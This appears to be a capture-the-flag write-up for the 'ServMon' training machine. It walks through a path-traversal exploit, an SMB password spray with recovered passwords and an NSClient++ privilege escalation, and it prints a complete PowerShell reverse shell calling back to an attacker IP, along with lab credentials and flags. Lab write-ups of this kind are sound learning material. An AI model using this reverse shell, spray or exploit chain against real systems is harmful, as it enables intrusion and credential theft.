Sermon

Rustscan

rustscan --ulimit 5000 -a 10.129.227.77 -- -sV -sC

FTP

ftp anonymous@10.129.227.77

Nadine
Nathan

Nadine Share – Confidential.txt

Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it 
yourself and place it back into the secure folder.

Regards

Nadine

Nathan Share– Notes to do.txt

Notes to do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Googling NMVS you eventually locate this python script: NVMS1000-Exploit

Host is vulnerable to path traversal CVE-2019-20085

Located User Credentials in ../../../../../../../../users/nathan/desktop/passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Netexec

Password spray found credentials

netexec smb 10.129.227.77 -u nadine -p passwords.txt

- ServMon\nadine:L1k3B1gBut7s@W0rk

smbmap -u 'nadine' -p "L1k3B1gBut7s@W0rk" -H 10.129.227.77

SSH

SSH As Nadine


ssh nadine@10.129.227.77
L1k3B1gBut7s@W0rk


User Flag


sb109fddcc69dba6ff8b27b73bb90e5f5

Enumeration

Located NSClient++ configuration file with credentials
ExploitDB-46802

ew2x6SsGTxjRwXOT

#create .bat file

powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file “c:\temp\reverse.ps1”

upload revershell reverse.ps1 to temp folder

“powershell #1 $LHOST = “10.10.14.118”; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write(“$Outputn”); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

With Proxy running go to https[:]localhost:8443

1. Settings > Settings > scripts > add new
2. set section to '/settings/external scripts/scripts/powershell'
3. set command to 'command'
4. set key to 'path of ps1 e.g., c:\temp\test.ps1'
5. save
6. control > reload
7. navigate to queries > script name
8. Run after starting netcat listener


Root.txt

8ab637b9bd6d7848f602532cdb57d9cd